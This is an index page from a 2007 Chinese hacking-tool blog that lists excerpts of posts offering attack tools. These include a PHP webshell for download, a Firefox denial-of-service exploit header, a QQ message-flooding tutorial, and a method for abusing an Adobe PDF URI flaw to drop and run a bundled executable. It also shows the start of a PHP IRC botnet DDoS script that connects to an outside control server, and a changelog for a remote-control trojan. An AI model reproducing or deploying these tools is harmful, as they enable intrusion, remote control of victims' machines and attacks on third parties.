HYTOP PHPwebshell 0.0001ver

2007/10/23 10:15 | 鬼仔 | 工具收集 | 消灭0留言

鬼仔注:lcx开始写PHPwebshell了。
这个貌似还是个雏形。
我截了两张图。
/**
Thk:angle maple-x wwofeiwo Netpath
HYTOP PHPwebshell 0.0001ver only test windows2003+APMServ5.2.0
**/

作者:lcx
来源:vbs小铺

学了几天的php,参考(抄袭)别人的代码,写了这个东东,可以给刚学php 的人当个例程吧,没有美化,程序好读又简单,嘿嘿.仅测试了win2003+apache+php5

下载:HYTOP_PHPwebshell.rar
阅读全文 »

Tags:

Mozilla Firefox < = 2.0.0.7 Remote Denial of Service Exploit

2007/10/23 10:09 | 鬼仔 | 工具收集 | 消灭0留言

i######################### WwW.BugReport.ir #########################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service
# Vendor URL: www.mozilla.org
# Version: <= 2.0.0.7
# Fix Available: Yes!
# Soloution: Update to 2.0.0.8
# Note: This bug works on 2.0.0.8 in different 阅读全文 »

Tags: ,

图像转数据流<->asp&php

2007/10/23 7:45 | 鬼仔 | 工具收集 | 消灭0留言

来源:vbs小铺

asp图像转数据流:

<%Function ReadGif(sStr)
Dim i, iHex, sPath, oStream
sPath = Server.MapPath(sStr)
Set oStream = Server.CreateObject("Adodb.Stream")
oStream.Type = 1
oStream.Open
oStream.LoadFromFile sPath

For i = 1 To LenB(oStream.Read())
oStream.Position = 0
iHex = Hex(AscB(MidB(oStream.Read(), i, 1)))
If Len(iHex) = 1 Then iHex = "0" & iHex
阅读全文 »

iPhone 1.1.1/iPod Touch文件系统破解源代码

2007/10/23 5:21 | 鬼仔 | 工具收集 | 消灭0留言

鬼仔注:文件镜像

来源:cnBeta.COM

破解组织近日公布了iPhone 1.1.1/iPod Touch文件系统破解的整个源代码,有兴趣的黑客可以在此基础上进行研究和继续开发。该破解利用了iPhone/iPod Touch中Safari浏览器在处理TIFF图片时的一处漏洞,从而获取系统的控制权,对应1.0.2和1.1.1版本iPhone以及iPod Touch。之前,破解组织曾经公布一个攻击代码网址,用户只需要访问这个网址就可以自动运行攻击代码,开始破解。而源代码公布后,无疑可以更加放心的进行破解。

itiff_exploit.cpp

Tags: , ,

利用BCB自己打造QQ炸弹

2007/10/22 10:53 | 鬼仔 | 技术文章 | 消灭0留言

来源:灰狐's Blog

注:本文已发表在2007年《黑客防线》第10期,版权归《黑客防线》所有。

俗话说的好啊:不会编程的黑客就不是好黑客(我会编程,但我也不是黑客,因为我是个——程序员,哈哈)。今天呢我们就来亲自动手打造一个专属于自己的小工具。
我们要做的是一个QQ炸弹,这年头用QQ的人实在多。这林子大了可是什么鸟都有,当然其实我们今天做这个工具的威力并不是很大,顶多只能和好友聊天的时候骚扰一下。思路很简单,就是通过程序不停地模拟按键Ctrl+Enter自动发送消息,不过当我们做成的时候心里自然也会有那么一种满足和喜悦。
编程工具的选择其实很重要,像这样的小东东如果用VC来做那真不是一般地麻烦,什么?你说delphi很快?那倒是,不过会pascal的肯定没会C 阅读全文 »

Tags: ,

Adobe pdf reader URI利用方式浅析

2007/10/22 10:26 | 鬼仔 | 技术文章 | 消灭0留言

来源:大能寺

poc有人已经公布了.利用方式基本上清一色的tftp,tftp利用起来有限制,防火墙的因素.那么简单说说另外一种利用方式–捆绑exe生成并执行.
首先这个漏洞可以执行任意命令.我没试过直接在mailto那里直接echo exe.貌似好写很多行&哦.这样太疯狂.
在PDF格式中第一行必须有%PDF-1.7%.这个跟jpg,gif没什么区别.如果没%pdf-1.7%,那么adobe reader提示是无效pdf.
关于PDF的详解情况,可以参见(http://www.adobe.com/devnet/pdf/pdf_reference.html).

这里牵涉到另外一个知识点.copy +b来合并文件.这样子合并一个exe和jpg,exe和jpg都能执行.
好,那写段脚本,vb 阅读全文 »

Tags: , ,

PHP DDoS Bot

2007/10/21 11:02 | 鬼仔 | 工具收集 | 消灭0留言

来源:amxku's blog

<?php
/*
PHP ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";

set_time_limit(0);
$loop = 0; $verbonden = 0;
$verbinden = fsockopen($server, $Port);

while ($read = fgets($verbinden,512)) {
阅读全文 »

Tags: ,

irat – 内测版 1010

2007/10/20 12:31 | 鬼仔 | 工具收集 | 消灭0留言

来源:XG's Blog

history

说明

修正bug
[+]增加功能
[-]去掉功能
[PS]附加说明

2007-10-10 var 1.2 b6

关闭客户端当有聊天窗口服务端不能关闭

服务端有时CPU占用100%

屏幕监控界面改进

修改备注要重启服务端显示
[+]屏幕监控鼠标轨迹
[+]屏幕监控保存为jpg格式图片
[+]备用上线地址
[+]消息广播
[+]3端口同时监听
[+]被控端解析program files目录
[-]被控端解析temp目录

2007-10-7 16:47:09 var 1.1 b5

屏幕监控关闭后,有时服务端吃了cpu问题
[+]参数设置
[+]部分Hint提示
[+]任意可视窗口闪屏

2007-10-3 VAR 1.1 bate1
阅读全文 »